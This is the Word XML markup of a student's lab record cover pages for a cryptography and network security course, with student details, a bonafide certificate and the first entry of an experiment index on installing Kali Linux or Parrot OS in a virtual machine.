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CB7AE4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b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RAJALAKSHMI ENGINEERING COLLEGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43364F53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b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RAJALAKSHMI NAGAR, THANDALAM – 602 105</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158DFC78" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="031B4EDB" w14:textId="65B180D9" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:r w:rsidRPr="007D5C22"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7F5C4FDC" wp14:editId="7A5BDEC4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>944880</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2834640" cy="807720"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="114300" distR="114300"/>
            <wp:docPr id="12505839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80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CD112" w14:textId="59492230" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625"/>
    <w:p w14:paraId="05DD6B26" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625"/>
    <w:p w14:paraId="1A643F7D" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625"/>
    <w:p w14:paraId="12E4581C" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625"/>
    <w:p w14:paraId="5D14D867" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03BEC409" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B351A7" w14:textId="20360149" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5352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7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DEPARTMENT OF INFORMATION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66"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EF7625" w14:paraId="5D50C43B" w14:textId="77777777" w:rsidTr="00902553">
        <w:trPr>
          <w:trHeight w:val="850"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8566" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B502964" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="00C06084" w:rsidRDefault="00EF7625" w:rsidP="00902553">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C06084">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CS23632 Cryptography and Network Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF7625" w14:paraId="4FC34D68" w14:textId="77777777" w:rsidTr="00902553">
        <w:trPr>
          <w:trHeight w:val="850"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8566" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E8502A4" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00902553">
            <w:pPr>
              <w:jc w:val="center"/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Laboratory Record Note Book</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="466"/>
        <w:tblW w:w="924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1"/>
        <w:gridCol w:w="5069"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EF7625" w14:paraId="6E1B75EE" w14:textId="77777777" w:rsidTr="00EF7625">
        <w:trPr>
          <w:trHeight w:val="530"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4171" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0863F540" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
            <w:pPr>
              <w:spacing w:before="240"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</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF7625"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5069" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DC4486D" w14:textId="2AA7595B" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
            <w:pPr>
              <w:spacing w:before="240"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>…</w:t>
            </w:r>
            <w:r w:rsidR="009E3BEF">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">VINOTH M </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF7625">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>…….</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF7625" w14:paraId="4538A6F7" w14:textId="77777777" w:rsidTr="00EF7625">
        <w:trPr>
          <w:trHeight w:val="524"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4171" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E8820E0" w14:textId="56D1CCBF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EF7625">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">Year / Branch / </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF7625">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Section :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5069" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3761FD21" w14:textId="068B5778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>……</w:t>
            </w:r>
            <w:r w:rsidR="009E3BEF" w:rsidRPr="00EF7625">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>…</w:t>
            </w:r>
            <w:r w:rsidR="009E3BEF">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>III/IT</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF7625">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>…………………</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF7625" w14:paraId="16246E3B" w14:textId="77777777" w:rsidTr="00EF7625">
        <w:trPr>
          <w:trHeight w:val="632"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4171" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="296A329D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University Register </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF7625">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>No. :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5069" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A24858D" w14:textId="5A68EE50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>………</w:t>
            </w:r>
            <w:r w:rsidR="009E3BEF">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>2116231001246</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF7625">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>………</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF7625" w14:paraId="716E145F" w14:textId="77777777" w:rsidTr="00EF7625">
        <w:trPr>
          <w:trHeight w:val="614"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4171" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EA59884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College Roll </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF7625">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>No. :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5069" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01D8B395" w14:textId="311A562E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>………</w:t>
            </w:r>
            <w:r w:rsidR="009E3BEF">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>231001246</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF7625">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>…………….</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF7625" w14:paraId="57E43489" w14:textId="77777777" w:rsidTr="00EF7625">
        <w:trPr>
          <w:trHeight w:val="443"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4171" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27107807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</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF7625">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Semester :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5069" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DD96428" w14:textId="12E1E012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>……………</w:t>
            </w:r>
            <w:r w:rsidR="009E3BEF">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>VI</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF7625">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>…………………….</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF7625" w14:paraId="3E17778F" w14:textId="77777777" w:rsidTr="00EF7625">
        <w:trPr>
          <w:trHeight w:val="524"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4171" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68C05C16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Academic </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF7625">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Year :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5069" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36999C8C" w14:textId="7D3D1AF8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>………</w:t>
            </w:r>
            <w:r w:rsidR="009E3BEF">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>2025-2026</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF7625">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>………………</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="127D6421" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="008E3273" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="75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163B1C8E" w14:textId="1F1F371C" w:rsidR="00EF7625" w:rsidRDefault="00EF762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4FECD19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7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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10594C0" wp14:editId="2E28716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476250" cy="588645"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="927701950" name="Picture 92770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7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">RAJALAKSHMI ENGINEERING COLLEGE </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0EEAE2" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>An Autonomous Institution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D55BFC9" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DAB5A23" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71ADBB91" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="00FD09D0" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD09D0">
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD09D0">
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>BONAFIDE CERTIFICATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD09D0">
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31019520" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C2B263" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="006D44DC" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C42378F" w14:textId="0848A6CB" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625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EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Name: ………</w:t>
      </w:r>
      <w:r w:rsidR="009E3BEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>VINOTH M</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>……………………………………………</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735A609B" w14:textId="40505510" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625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EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Academic Year: …</w:t>
      </w:r>
      <w:r w:rsidR="009E3BEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2025-2026</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>… Semester: …</w:t>
      </w:r>
      <w:r w:rsidR="009E3BEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>VI</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>……… Branch: …</w:t>
      </w:r>
      <w:r w:rsidR="009E3BEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>IT</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>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EF7625" w14:paraId="40410A52" w14:textId="77777777" w:rsidTr="00902553"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391D95" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00902553">
            <w:pPr>
              <w:spacing w:line="600" w:lineRule="auto"/>
              <w:jc w:val="right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 xml:space="preserve">Register No.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BFF6" w14:textId="688BB636" w:rsidR="00EF7625" w:rsidRDefault="00E00B0D" w:rsidP="00902553">
            <w:pPr>
              <w:spacing w:line="600" w:lineRule="auto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>2116</w:t>
            </w:r>
            <w:r w:rsidR="009E3BEF">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>231001246</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A35D058" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:spacing w:line="600" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8690AB" w14:textId="3F34D2A1" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625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  <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Certified that this is the Bonafide record of work done by the above student in th</w:t>
      </w:r>
      <w:r w:rsidR="009E3BEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="009E3BEF" w:rsidRPr="009E3BEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CS23632 Cryptography and Network Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Laboratory during the academic year 2026 – 2027.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E68BBA6" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625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</w:p>
    <w:p w14:paraId="22F3ACBE" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625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jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Signature of Faculty in-charge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7936BBE7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D386AD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24E27B22" w14:textId="4AEFF292" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Submitted for the Practical Examination held on </w:t>
      </w:r>
      <w:r w:rsidR="009E3BEF" w:rsidRPr="009E3BEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>11-05-2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9A8A7D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6BFADAA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275F47B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230BC1F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22ADB5E7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7D2811B6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53C7186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7ADBE5A3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  <w:sectPr w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidSect="00EF7625">
          <w:footerReference w:type="default" r:id="rId10"/>
          <w:pgSz w:w="11907" w:h="16839"/>
          <w:pgMar w:top="1276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</w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Internal Examiner                                                     External Examiner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0953A3" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1340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F7625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Y="520"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="995"/>
        <w:gridCol w:w="4448"/>
        <w:gridCol w:w="1558"/>
        <w:gridCol w:w="1844"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EF7625" w:rsidRPr="00F45390" w14:paraId="346462B3" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72DA4AD6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48" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B75DD8B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EXPERIMENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33C0E341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1844" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09DB1294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GITHUB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF7625" w:rsidRPr="00F45390" w14:paraId="01AEFA13" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A2B49F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448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39C05F0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Installation and Configuration of Kali Linux/Parrot OS in a VMware/VirtualBox.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
